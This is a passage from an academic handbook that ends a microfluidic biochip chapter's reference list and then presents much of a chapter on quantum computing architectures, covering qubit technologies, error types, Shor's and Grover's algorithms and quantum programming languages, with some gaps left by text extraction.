uncertainty in micro-electrode-dot-array digital microfluidic biochips. IEEE Trans Multi-Scale
Comput Syst 4(4):811–821
Crites B, Kong K, Brisk P, Diagonal component expansion for flow-layer placement of flow-based
microfluidic biochips. ACM Trans Emb Comput Syst 16(5s):1–18
FDA advisors approve of Baebies SEEKER analyzer for newborns (2016). Available at https://
www.baebies.com/fda-advisors-back-approval-baebies-seeker-analyzer-newborns/.
FDA advisors back approval of Baebies’ SEEKER analyzer for newborns (2020). http://baebies.
com/fda-advisors-back-approval-baebies-seeker-analyzer-newborns, last accessed: August 8,
2020
FDA advisors approve of Baebies SEEKER 1.5 for SARS-CoV-2 test (2021). Available at https://
baebies.com/products/sars-cov-2-rt-pcr-test/
Fidalgo LM, Maerkl SJ (2011) A software-programmable microfluidic device for automated
biology. Lab Chip 11(9):1612–1619
Fluidigm (2020). https://www.fluidigm.com/, last accessed: August 8, 2020
Genmark dx (2020). https://www.genmarkdx.com/, last accessed: August 8, 2020
Grimmer A, Wang Q, Yao H, Ho T-Y, Wille R (2017) Close-to-optimal placement and routing
for continuous-flow microfluidic biochips. In: Proceedings of Asia and South Pacific Design
Automation Conference, pp 530–535
Hengxin bio (2020). http://www.hengxinbio.com/en/index.aspx, last accessed: August 8, 2020
Howladar P, Roy D, Roy P, Rahaman H (2016) Cross-reference EWOD driving scheme and cross-
contamination aware net placement technique for MEDA based DMFBs. In: Proceedings of
IEEE International Conference on Advances in Computing, Communications and Informatics
(ICACCI), pp 614–619
Huang T-W, Lin C-H, Ho T-Y (2009) A contamination aware droplet routing algorithm for
digital microfluidic biochips. In: 2009 IEEE/ACM International Conference on Computer-
Aided Design-Digest of Technical Papers. IEEE, pp 151–156
Huang X, Ho T-Y, Guo W, Li B, Schlichtmann U (2019a) MiniControl: synthesis of continuous-
flow microfluidics with strictly constrained control ports. In: Proceedings of Design Automation
Conference, vol 145, pp 1–6
720 X. Huang et al.
Liu C, Huang X, Li B, Yao H, Pop P, Ho T-Y, Schlichtmann U (2021) DCSA: distributed channel-
storage architecture for flow-based microfluidic biochips. IEEE Trans Comput-Aided Des Integr
Circuits Syst 40(1):115–128
Lu G-R, Bhattacharya BB, Ho T-Y, Chen H-M (2018) Multi-level droplet routing in active-
matrix based digital-microfluidic biochips, In: Proceedings of Asia and South Pacific Design
Automation Conference (ASP-DAC), pp 46–51
Luo Y, Chakrabarty K, Ho T-Y (2012) Dictionary-based error recovery in cyberphysical digital-
microfluidic biochips. In: IEEE/ACM International Conference on Computer-Aided Design
(ICCAD), 2012, pp 369–376
Luo Y, Bhattacharya BB, Ho T-Y, Chakrabarty K, Design and optimization of a cyberphysical
digital-microfluidic biochip for the polymerase chain reaction. IEEE Trans Comput-Aided
Design Integr Circuits Syst 34(1):29–42
Minhass WH, Pop P, Madsen J, Ho T-Y (2013) Control synthesis for the flow-based microfluidic
large-scale integration biochips. In: Proceedings Asia and South Pacific Design Automation
Conference, pp 205–212
Najjar D, Rainbow J, Sharma Timilsina S, Jolly P, De Puig H, Yafia M, Durr N, Sallum H, Alter G,
Li JZ et al (2022) A lab-on-a-chip for the concurrent electrochemical detection of SARS-CoV-2
RNA and anti-SARS-CoV-2 antibodies in saliva and plasma. Nat Biomed Eng 6(8):968–978
NOWDiagnostics (2020). https://nowdx.com/, last accessed: August 8, 2020
O’neal K, Grissom D, Brisk P (2017) Resource-constrained scheduling for digital microfluidic
biochips. ACM J Emerg Technol Comput Syst (JETC) 14(1):7
Perkel JM (2008) Life science technologies: microfluidics bringing new things to life science.
Science 322(5903):975–977
Ricketts AJ, Irick K, Vijaykrishnan N, Irwin MJ (2006) Priority scheduling in digital microfluidics-
based biochips. In Proceedings of the Conference on Design, Automation and Test in Europe
(DATE), pp 329–334
Schneider A, Pop P, Madsen J (2018) Pin-count reduction for continuous flow microfluidic
biochips. Microsyst Technol 24(1):483–494
Sista RS, Ng R, Nuffer M, Basmajian M, Coyne J, Elderbroom J, Hull D, Kay K, Krishnamurthy
M, Roberts C et al (2020) Digital microfluidic platform to maximize diagnostic tests with low
sample volumes from newborns and pediatric patients. Diagnostics 10(1):21
Su F, Chakrabarty K (2005) Unified high-level synthesis and module placement for defect-tolerant
microfluidic biochips. In: Proceedings of the Design Automation Conference (DAC), pp 825–
830
Su F, Chakrabarty K (2006) Module placement for fault-tolerant microfluidics-based biochips.
ACM Trans Des Autom Electr Syst (TODAES) 11(3):682–710
Su F, Chakrabarty K (2008) High-level synthesis of digital microfluidic biochips. ACM J Emerg
Technol Comput Syst (JETC) 3(4):1–32
Su F, Hwang W, Chakrabarty K, Droplet routing in the synthesis of digital microfluidic biochips.
In: Proceedings of DATE, vol 1. pp 1–6
Tseng K-H, You S-C, Liou J-Y, Ho T-Y (2013) A top-down synthesis methodology for flow-
based microfluidic biochips considering valve-switching minimization. In: Proceedings of the
International Symposium on Physical Design, pp 123–129
Tseng T-M, Li B, Schlichtmann U, Ho T-Y (2015) Storage and caching: synthesis of flow-based
microfluidic biochips. IEEE Des Test 32(6):69–75
Tseng T-M, Li B, Li M, Ho T-Y, Schlichtmann U (2016) Reliability-aware synthesis with dynamic
device mapping and fluid routing for flow-based microfluidic biochips. IEEE Trans Comput-
Aided Design Integr Circuits Syst 35(12):1981–1994
Tseng T-M, Li M, Freitas DN, McAuley T, Li B, Ho T-Y, Araci IE, Schlichtmann U, Columba 2.0:
a co-layout synthesis tool for continuous-flow microfluidic biochips. IEEE Trans Comput-Aided
Des Integr Circuits Syst 37(8):1588–1601
Tseng T-M, Li M, Zhang Y, Ho T-Y, Schlichtmann U, Cloud Columba: accessible design
automation platform for production and inspiration. In: Proceedings of International Conference
Computer-Aided Design, pp 1–6
722 X. Huang et al.
Urbanski JP, Thies W, Rhodes C, Amarasinghe S, Thorsen T, Digital microfluidics using soft
lithography. Lab Chip 6(1):96–104
Urbanski J, Thies B, Amarasinghe S, Thorsen T (2007) (Online) Programmable microfluidics.
[Online]. Available: http://groups.csail.mit.edu/cag/biostream/
Wang G, Teng D, Fan S-K (2011) Digital microfluidic operations on micro-electrode dot array
architecture. IET Nanobiotechnol 5(4):152–160
Wang Q, Ru Y, Yao H, Ho T-Y, Cai Y (2016) Sequence-pair-based placement and routing for
flow-based microfluidic biochips. In: Proceedings of Asia and South Pacific Design Automation
Conference, pp 587–592
Wang Q, Xu Y, Zuo S, Yao H, Ho T-Y, Li B, Schlichtmann U, Cai Y (2017) Pressure-aware
control layer optimization for flow-based microfluidic biochips. IEEE Trans Biomed Circuits
Syst 11(6):1488–1499
Wu J-L, Li KS-M, Li J-D, Wang S-J, Ho T-Y (2018) SOLAR: simultaneous optimization of
control-layer pins placement and channel routing in flow-based microfluidic biochips. In:
Proceedings of International Symposium VLSI Design Automation Test, pp 1–4
Xu T, Chakrabarty K (2007) Integrated droplet routing in the synthesis of microfluidic biochips.
In: Proceedings of Design Automation Conference, pp 948–953
Yang K, Yao H, Ho T-Y, Xin K, Cai Y (2018) AARF: any-angle routing for flow-based microfluidic
biochips. IEEE Trans Comput-Aided Des Integr Circuits Syst 37(12):3042–3055
Yao H, Wang Q, Ru Y, Cai Y, Ho T-Y (2015) Integrated flow-control codesign methodology for
flow-based microfluidic biochips. IEEE Des Test 32(6):60–68
Yao H, Ho T-Y, Cai Y (2015) PACOR: practical control-layer routing flow with length-matching
constraint for flow-based microfluidic biochips. In: Proceedings of Design Automation Confer-
ence, pp 1–6
Yuh P-H, Yang C-L, Chang Y-W (2008) Bioroute: a network-flow-based routing algorithm for the
synthesis of digital microfluidic biochips. IEEE Trans Comput-Aided Des Integr Circuits Syst
(TCAD) 27(11):1928–1941
Zhu Y, Huang X, Li B, Ho T-Y, Wang Q, Yao H, Wille R, Schlichtmann U, MultiControl: advanced
control logic synthesis for flow-based microfluidic biochips. IEEE Trans Comput-Aided Des
Integr Circuits Syst 39(10):2489–2502
Architectures for Quantum Information
Processing 21
Suryansh Upadhyay, Mahabubul Alam, and Swaroop Ghosh
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 724
Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 725
Quantum Bits (Qubits) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 726
Quantum Gates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 727
Quantum Error . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 727
Quantum Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 729
Qubit Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 730
Quantum Algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 732
Algorithms Designed for Fault-Tolerant Quantum Computers . . . . . . . . . . . . . . . . . . . . . . . 733
Algorithms for NISQ Computers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 734
Quantum Software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 735
Quantum Program, Quantum Instruction Sets, and Software
Development Kits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 735
Quantum Programming Languages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 736
Quantum Annealing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 738
Compilation, Mapping, and Optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 739
Superconducting Quantum Computers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 740
Trapped-Ion Quantum Computers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 741
Considerations for Noisy Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 743
Technology Agnostic Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 743
Superconducting-Specific Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 744
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 746
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 746
Abstract
Quantum computing is changing the way people think about computing. Signifi-
cant strides in research and development for managing and harnessing the power
of quantum systems has been made in recent years, demonstrating the potential
for transformative quantum technology. Quantum phenomena like superposition,
entanglement, and interference can be exploited to solve issues that are difficult
for traditional computers. IBM’s first public access to true quantum computers
through the cloud and Google’s demonstration of quantum supremacy are
among the accomplishments. Besides, a slew of other commercial, government,
and academic projects are in the works to create next-generation hardware, a
software stack to support the hardware ecosystem, and viable quantum algo-
rithms. This chapter covers various quantum computing architectures including
many hardware technologies that are being investigated. It also discusses a
variety of challenges, including numerous errors/noises that plague the quantum
computers. An overview of literature investigating noise-resilience approaches is
also presented.
Keywords
Introduction
one of the most well-known quantum algorithms, can factor an integer in prime
numbers tenfold quicker than the best conventional solution. The impact of this
exponential speedup on encryption and Internet security is substantial. Cirac and
Zoller suggested the experimental implementation of the Controlled NOT (CNOT)
gate (Cirac and Zoller 1995) on the hardware side. Following that, nuclear magnetic
resonance (NMR)-based devices were used to demonstrate quantum computing
hardware, including the first demonstration of a full-fledged quantum algorithm
on a 2-qubit NMR computer at Oxford University. Schoelkopf, Devoret, Girvin,
and colleagues at Yale University invented the superconducting “Transmon” qubit,
which revolutionized qubit technology and paved the road for scalability. IBM first
provided access to a 5-qubit programmable quantum computer through the cloud.
The free access to quantum computers attracted many researchers around the globe
to the world of quantum computing. The quantum threshold theorem (Shor 1994)
demonstrated that if the error to perform each gate is a small enough, one can
perform arbitrarily long quantum computations to arbitrarily good precision with
only a small increase in gate count. This shows that quantum computers can be made
fault-tolerant. Especially in the last few years, quantum computing has experienced
breakthroughs across the stack, including algorithm, architecture, and hardware.
The most notable of these is the demonstration of Quantum Supremacy by Google
(Arute et al. 2019). The group of researchers from Google performed a task on a 53-
qubit quantum computer in seconds which arguably would take days on the fastest
classical supercomputer. Application domains of QC now include machine learning,
security, drug discovery, computational quantum chemistry, and optimization.
On the one hand, researchers are proposing new quantum algorithms to speed up
computation, while on the other hand, various technologies like superconducting,
trapped-ion (TI), and photonics are also being studied to design efficient quantum
bits or qubits. Despite all the signs of progress, quantum computers are yet to solve
practical-scale problems.
The quantum computer architecture is essential for the functioning of a quantum
computer. Despite various system optimizations, the performance of a quantum
processor is still severely constrained by the amount of available computation
resource. This chapter covers the fundamentals of quantum computing architectures
including some of the most often used hardware architectures and the associated
software stacks. It also discusses the numerous issues that these technologies face,
as well as a literature review of efforts to address these architectural issues for both
hardware and software stacks. Figure 1 illustrates the topics covered in this chapter.
Background
Fig. 2 Bloch sphere representation of state (a) |0 and state (b) |1. (c) Bloch sphere representation
of the RY (π/2) gate on state |0
Quantum Gates
Gates are used in quantum computing systems to regulate qubit amplitudes and
execute computations. At any given time, gates can act on one or more qubits. QC
systems often support a set of universal single-qubit and two-qubit gates, similar to
universal gates in classical computing. Quantum gates, unlike classical logic gates,
are not physically formed; instead, they are realized through the use of pulses. These
gate sets are used to express QC applications. A sequence of gates is executed on a
set of correctly initialized qubits to run a program. The gates change the amplitudes
of the qubits, moving the state space closer to the desired output. Intuitively, the gate
pulses cause distinct rotations along different axes in the Bloch sphere (depending
on pulse amplitude, duration, and shape). For example, the RY (π/2) (rotation along
Y-axis) can be a quantum gate, and it will rotate a qubit state by π/2 radian around
Y-axis (e.g., applying an RY (π/2) will put a qubit in |0 state in the superposition
state, Fig. 2c).
Mathematically, quantum gates are represented using unitary matrices (a matrix
U is unitary if UU† = I, where U† is the adjoint of matrix U and I is the identity
matrix). For an n-qubit gate, the dimension of the unitary matrix is 2n×2n. Any
unitary matrix can be a quantum gate. However, in existing systems, only a handful
of gates are possible, often known as the native gates or basis gates of that quantum
processor. For IBM systems, the basis gates are ID, RZ, SX, X, and CNOT. CNOT is
the only 2-qubit gate, and others are single-qubit. Any non-native gate in a quantum
circuit is first decomposed using the native gates.
Quantum Error
Quantum systems are plagued with noise because of the quantum gates being error-
prone. Besides, the qubits suffer from decoherence, i.e., the qubits spontaneously
interact with the environment and lose states. Therefore, the output of a quantum
circuit is erroneous. The deeper quantum circuit needs more time to execute and gets
728 S. Upadhyay et al.
affected by decoherence. More gates in the circuit also increase the accumulation
of gate error. Parallel gate operations on different qubits can affect each other’s
performance which is known as crosstalk. This section elaborates on these errors:
Gate Error
Quantum gates are realized with pulses, and the pulses can be erroneous. For
example, consider the RY (π/2) gate. Due to variation, the pulse intended for a π/2
rotation may not result in an exact π/2 rotation, and it may under-rotate or over-
rotate, leading to erroneous logical operation. As a result, gate failures are caused
by faulty logical operations. For present systems, 2-qubit gate errors (e.g., CNOT
error) are an order of magnitude larger than 1-qubit gate faults. A quantum circuit
with a larger number of gates will accrue more gate faults, lowering the quantum
program’s reliability. Hence, compilation and error-tolerant mapping have the goal
of reducing the number of gates in the quantum circuit.
Measurement Error
Reading out a qubit containing a state 1 may result in a state 0 and vice versa due to
readout error; this arises due to measuring circuitry imperfections. The readout error
probability can be quantified using a simple technique. It entails preparing a qubit in
all binary states (i.e., 0 and 1 for a single qubit) and reading it out (both preparation
and measurement multiple times). The qubits on IBM machines are initially set to
0 states by default. Therefore, to prepare state “1,” a quantum-NOT (X) gate has
to be applied to the |0 state. Ideally, if the process of preparing a state 0 or 1 and
reading out N times is repeated, it should generate 0 or 1 all the time. However, due
to readout error, a flipped bit might be read in some of the cases. For example, say
state 0 is prepared and measured 1000 times. Out of these 1000 trials, 900 times it
reads out 0, and other 100 times it reads out 1. Thus, measurement error rate M01
will be 100/1000 = 0.1 (Mxy stands for probability of reading out state “y,” while
the prepared state is “x”; thus, M00 = 900/1000 = 0.90). For multi-qubit readout
characterization, the same protocol applies. However, the number of binary states
that need to be prepared and read will be higher. For example, to characterize a
3-qubit system, 23 = 8 binary states (000, 001, 010, . . . , 110, and 111) need to be
prepared and measured (each N-times). Unlike gate error and decoherence, which
depend on the number of gates in the circuit, readout error is gate count agnostic.
It solely depends on the state being read.
Crosstalk Error
Crosstalk is another kind of error present in the near-term quantum computers. The
effect of a gate operation on one qubit should, in theory, be unaffected by what
happens on other qubits. Pulses are used to create quantum gates. However, the gate
pulse intended for one qubit can accidentally excite an unwanted qubit, which is
known as “crosstalk.” Crosstalk may cause conditional dependence in gate errors.
As a result, the gate error of a single gate operation may differ from the gate error
of a parallel gate operation. According to Murali et al. (2020a), the gate error with
another operation running in parallel can be 2X–3X higher than with an isolated
gate operation.
Quantum Hardware
Having introduced quantum computing basics in the prior section, this section
focuses on the various hardware technologies and developments (Fig. 4).
Fig. 4 (a) A two-trap TI system with three qubits each. (b) Coupling graph for ibmq_lima
superconducting device
730 S. Upadhyay et al.
Qubit Technologies
Superconducting Qubits
Superconductors allow an electrical current to flow with no resistance when cooled
to very low temperatures. Electrical circuits based on superconductors that behave
like qubits can be designed. The idea is to build an anharmonic oscillator. In an
anharmonic oscillator, the energy separation between states is different. Therefore,
the lowest two energy states are used as a qubit. For harmonic oscillators, the
energy states are equally separated, which makes it difficult to control interstate
transition. Superconducting qubits are fabricated by connecting a capacitor and a
superconducting Josephson junction (JJ) in parallel. This assembly works as an
anharmonic LC oscillator in which the Josephson junction works as a nonlinear
inductor. The JJ requires ultralow temperature for it to operate in the superconduct-
ing regime. Thus, superconducting qubits are usually hosted inside large dilution
refrigerators. Kjaergaard et al. (2020) gives a comprehensive overview of the
current state of play for superconducting qubits. Prominent companies conducting
research in superconducting quantum computing are Google, Rigetti, IMEC, BBN
Technologies, Intel, and IBM. According to Li et al. (2021), quantum software and
hardware systems should be designed collaboratively in order to fully exploit the
potential of quantum computing. They review several architectural design works.
One of them is developing a superconducting quantum processor architecture for a
specific program in order to achieve a high yield rate with a low mapping overhead.
The proposed architecture design flow is depicted in Fig. 5. They divided the design
of a superconducting quantum processor architecture into three key subroutines:
layout design, bus selection, and frequency allocation. Each subroutine targets a
different hardware component or configuration, incorporating profiling results and
Fig. 5 Overview of quantum application-specific architecture design flow. (Adopted from Li et al.
2021)
21 Architectures for Quantum Information Processing 731
physical constraints. They focus on the qubit placement in the layout design and
try to make those qubit pairs with more two-qubit gates between them nearby to
reduce the mapping overhead. The bus selection subroutine then determines how
the physical qubits are linked. According to the profiling information, they only add
qubit connections (also known as qubit buses) to the locations that are expected to
reduce the mapping overhead the most. Finally, the frequency allocation function
will assign frequencies to all physical qubits that have been put. By attempting to
eliminate frequency collision scenarios on the created architecture, the subroutine
will boost the final yield rate.
Trapped-Ion Qubits
Another way of realizing a qubit is by using the energy levels of electrons in neutral
atoms or ions. In their natural state, these electrons occupy the lowest possible
energy levels. Lasers are used to “excite” them to a higher energy level and can
assign the qubit values based on their energy state. Trapped-ion QC system is
implemented by trapping ionized atoms like Yb or Ca between electrodes using
electromagnetic field (Wright et al. 2019). Data |0 and |1 are encoded as internal
states such as hyperfine or Zeeman states of the ions. Qubits are stored in stable
electronic states of each ion, and quantum information can be transferred through
the collective quantized motion of the ions in a shared trap (interacting through the
Coulomb force). Figure 4a, illustrates various components of a 2-trap TI system.
The ions are organized in the form of an ion chain inside a trap. Trap capacity
is the maximum number of ions that a trap can accommodate. The traps are
connected by a shuttle path which allows movement (shuttle) of an ion from one
trap to another if needed. Prominent companies conducting research in trapped-
ion quantum computing are IonQ, Honeywell, Alpine Quantum Technologies, and
Universal Quantum. TI systems typically employ a single trap design, which has
significant scaling issues. A modular design known as the quantum charge-coupled
device (QCCD) has been proposed (Murali et al. 2020b) to advance toward the next
significant milestone of 50–100 qubit TI devices. Small traps are coupled by ion
shuttling in a QCCD-based TI system. Authors conduct an intensive application-
driven architecture analysis to evaluate the major design choices of trap size,
communication topology, and operation implementation methodologies in order to
realize QCCD-based TI systems with 50–100 qubits. They show that trap sizing
and communication topology decisions can affect application dependability by up
to three orders of magnitude using several applications as benchmarks and several
hardware design points. Another approach to design a hardware architecture for TI
systems is discussed in Wu et al. (2021). The authors propose adopting “TILT”
(Fig. 6), a linear “Turing machine-like” architecture with a multi-laser control
“head” in which a linear chain of ions moves back and forth under the laser head,
as a building block to extend previous scalable trapped-ion quantum computing
approaches. They claim that TILT can significantly decrease communication when
compared to quantum charge-coupled device (QCCD) systems of comparable size.
The principle behind a TILT design is that operations are only done to ions in the
732 S. Upadhyay et al.
Fig. 6 A quantum computer architecture based on trapped ions and linear tapes. Acousto-optic
modulators (AOMs) aim laser beams onto ions in the execution zone to perform quantum
operations. The entire ion chain is translated until the target qubit is relocated into the execution
zone in order to execute gate operations on the other qubits. (Adopted from Wu et al. 2021)
execution zone toward the center of the trap, and the chain is moved back and forth
to allow for long-range interactions. The complex shuttling primitives of a quantum
charge-coupled device (QCCD) design are hence not required for such a machine.
Spin Qubits
Controlling the spin of charge carriers (electrons and electron holes) in semicon-
ductor devices can also be used to implement a qubit (Chatterjee et al. 2021).
The majority of quantum particles act like tiny magnets. Spin is the name for this
characteristic. The spin orientation is either entirely up or fully down, never halfway
up or down. A spin qubit is created by combining these two states. Local depletion
of two-dimensional electron vapors in semiconductors such as gallium arsenide,
silicon, and germanium has been used to create spin qubits. Some reports also show
implementation in graphene (Trauzettel et al. 2007).
Quantum Algorithms
The initial quantum computing algorithms were developed with an ideal quantum
computer in mind, with the quantum gate model studied largely without noise.
Nielsen and Chuang (2002) is the canonical reference for this wave of quantum
algorithm development, and it remains a reliable reference for the theoretical basis
of quantum computing and quantum information to this day. The best-known
algorithms are Shor’s algorithm for factoring and Grover’s algorithm for searching
an unstructured database or an unordered list.
Shor’s Algorithm
Shor’s algorithms describe two quantum algorithms for integer factoring and
discrete logarithm exponentially faster than the best-known classical algorithms
(Shor 1994). Because of the apparent speedup compared to classical algorithms
and the implications of this speedup for known applications, it is a notable and
celebrated scientific contribution to quantum computing. Shor’s algorithms take
advantage of both quantum parallelism and entanglement. There are two sections to
the algorithm. The first portion of the algorithm converts the factoring problem into a
problem of determining a function’s period and can be implemented in a traditional
way. The quantum speedup is determined by the second portion, which uses the
quantum Fourier transform to find the period. Essentially, the paper Shor (1994)
shows that the factoring problem is equivalent to the problem of finding the period in
a sequence of numbers, although a sequence of numbers that is exponentially longer
than the number of bits of the corresponding number to be factored. Thus, while
this equivalency does not provide any help in solving the problem on a classical
computer (since it would need to generate this sequence of 2n numbers for an n-bit
number to factor, which would take an exponential amount of time), it is a perfect
problem for a quantum computer as it can be encoded into merely n qubits and
generated in a time that is polynomial in n. Once that sequence is generated, the
QFT can be used to find the period. Shor’s method, if implemented on a perfect
734 S. Upadhyay et al.
quantum computer, would allow the secret key of the most frequently used public
key cryptosystem, RSA, to be computed, meaning that public key encryption might
be readily broken.
Grover’s Algorithm
Grover’s algorithm also known as the quantum search algorithm was introduced by
Lov Grover
√ in (1996). It is used for searching an unsorted database with N entries
in O( N ) time and using O(logN) storage space. Searching an unsorted database
traditionally involves a linear
√ search, which takes O(N) time. Grover’s technique, on
the other hand, takes O( N) time and is the fastest quantum algorithm for doing so.
Unlike other quantum algorithms, which can provide exponential speedup over their
classical equivalents, it delivers a quadratic speedup. When N is big, even quadratic
speedup is significant. It may also be used to calculate the mean and median of a
group of values, as well as to solve the collision problem. It can also be used to tackle
NP-complete problems by doing exhaustive searches across all feasible solutions.
This would result in a significant speedup as compared to traditional techniques.
Grover’s algorithm can also be applied to speed up broad classes of algorithms.
Grover’s algorithm is probabilistic like all quantum algorithms, in the sense that
it gives the correct answer with high probability. The probability of failure can be
decreased by repeating the algorithm.
The near-term quantum devices have limited number of qubits. Moreover, they
suffer from various types of noises (decoherence, gate errors, measurement errors,
crosstalk, etc.). Due to these constraints, these machines are not yet fully capable
of executing quantum algorithms requiring high orders of error correction (such
as Shor’s factorization or Grover’s search). However, algorithms such as quantum
approximate optimization algorithm (QAOA), Variational Quantum Eigensolver
(VQE) promises to achieve quantum advantage with near-term machines because
they are based on a variational principle that does not necessitate error correction.
Most of these approaches utilize a conventional computer to perform an optimiza-
tion procedure using information extracted from the quantum device, usually in an
iterative fashion. These quantum optimization methods have been applied to diverse
areas such as quantum machine learning.
split down into a series of smaller problems that can be estimated independently
in VQE, with the sum of all outputs corresponding to the approximate solution of
interest. The process is repeated until a heuristic stopping criteria is met, which is
usually equivalent to reaching an energy threshold.
Quantum Software
The work published by Bettina Heim and group provides an overview of Q#, Qiskit,
Cirq, Quipper, and Scaffold as well as the tools/ecosystems that surround them,
21 Architectures for Quantum Information Processing 737
and how they have served as a foundation for current and future work (Heim et al.
2020). Q# is a hardware-agnostic quantum programming language designed to
enable the execution of large-scale applications on future quantum hardware (Svore
et al. 2018). As a result, rather than following the imperative style encouraged
by assembly-like languages, Q# focuses on providing high-level abstractions that
facilitate reasoning about the intended functionality. It is notable for its support
for expressing arbitrary classical control flow. This is in contrast to other quantum
programming languages, where this capability is frequently provided by a classical
host language. Unlike other quantum programming languages geared toward formal
verification, qubits in Q# are treated like any other data type. The associated
libraries, the Q# compiler, and all other components of the quantum development
kit are open source. OpenQASM is a quantum program intermediate representation
based on gates (Cross et al. 2017). It expresses quantum programs as lists of
instructions, which are frequently intended to be consumed directly by a quantum
processor. OpenQASM supports abstractions in the form of quantum gates, which
can be built in a hierarchical fashion using a set of intrinsic primitives assumed
to be available on the targeted processor, for example, a Toffoli gate made up of
CNOT gates, T gates, and H gates. In addition, OpenQASM supports single-qubit
measurement and basic classical control operations. Qiskit provides a Python-based
programming environment for creating and manipulating OpenQASM programs
(Treinish et al. 2019). It includes extensive simulation capabilities, such as state
vector and density matrix simulators that can be run on both CPUs and GPUs, in
addition to support for execution on quantum processors. As a result, it allows users
to simulate the effects of noise defined by any custom model, including arbitrary
Kraus operators. The online documentation (Qiskit documentation), which includes
tutorials and is generated for each release, provides a good overview of the full
range of capabilities included in Qiskit. Cirq is a Python quantum programming
library that focuses on supporting near-term quantum hardware. Cirq’s primary goal
is to enable the development of quantum programs capable of running on quantum
computers available now or in the near future that lack error correction (NISQ
hardware) and are subject to certain device topologies. It includes mechanisms for
fine-tuning how a quantum program executes on the specified quantum hardware,
as well as tools for simulating hardware constraints such as noise limitations or the
physical layout of the qubits (Cirq documentation). In contrast to other languages
where qubits can be allocated dynamically, layout in Cirq is done manually. It is built
into Python. Python’s control flow constructs, such as if and while test statements,
can be used to build a circuit before execution. Cirq includes device models for
many of Google’s quantum processors (Cirq documentation), such as Bristlecone
and Sycamore.
Quipper is a circuit description language, which means it can be used to
construct circuits by applying gates on qubits in an organized manner. The circuits
themselves are data that can be provided to functions in the host language Haskell
for circuit optimization, resource estimation, or error correction, for example.
Prototypical implementations of Quipper-like languages, such as Proto-Quipper-S
(Ross 2015), Proto-Quipper-M (Rios and Selinger 2017), and Proto-Quipper-D
738 S. Upadhyay et al.
(Fu et al. 2020), have evolved with the purpose of enforcing quantum-specific
features such as the quantum information no-cloning theorem. Scaffold is a stand-
alone programming language. It is intended to be similar to existing traditional
programming languages, like C: Scaffold uses the imperative programming model
of C, as well as many of its recognizable features such as functions (called modules
in Scaffold), if statements, loops, structures, and pre-processor directives (Abhari
et al. 2012). Scaffold programs can also automatically convert conventional func-
tions into reversible logic, which is done using quantum gates, and then incorporate
it as an oracle in a larger quantum algorithm (Abhari et al. 2012). Intel Quantum
SDK Intel recently demonstrated its Quantum SDK at IEEE Quantum Week, held
in Colorado, USA, 2022. It provides developers with tools to help them learn how to
program quantum algorithms. It is based upon the C++ programming language and
uses the LLVM intermediate level description from classical computing as a base.
It is designed to work with hybrid classical/quantum variational algorithms and
will be compatible with other components of Intel’s quantum stack, such as high-
performance quantum simulators and, eventually, Intel’s spin-qubit-based quantum
processor. The beta version is accessible via the Intel Developer Cloud.
Other quantum programming languages and open-source software frameworks
include Forest/PyQuil (Smith et al. 2016), ProjectQ (Steiger et al. 2018), QWIRE
(Green et al. 2013), staq (Staq-GitHub), Strawberry Fields (Strawberry fields), tket
(tket-GitHub), XACC (McCaskey et al. 2020), and QuTiP (Qutip documentation).
Quantum Annealing
Quantum compilation bridges the gap between the computing layer of high-level
quantum algorithms and the layer of physical qubits with their specific properties
and constraints. Quantum circuit optimization is an essential component of the
quantum computing toolchain. Many noisy intermediate-scale quantum (NISQ)
devices maintain only loose connectivity between qubits, which means that a valid
quantum circuit frequently requires swapping physical qubits to satisfy adjacency
requirements. Optimizing circuits to reduce such swaps and other parameters is
critical for using quantum hardware in the near future. A significant family of
optimal synthesis algorithms functions by completely enumerating all circuits and
returning the lowest cost circuit that can do the specified computation; this technique
is known as exhaustive or brute-force searching. This method is quite popular in the
circuit synthesis community for optimally assembling small frequently used gates
or functions to the target gate set, and it can be very effective in these modest
instances. Shende et al. (2002) synthesized all minimal gate count circuits for
reversible functions on 3 bits using a breadth-first search over the gate set X, CNOT,
740 S. Upadhyay et al.
T OF. While breadth-first searches are prevalent in reversible circuit synthesis, the
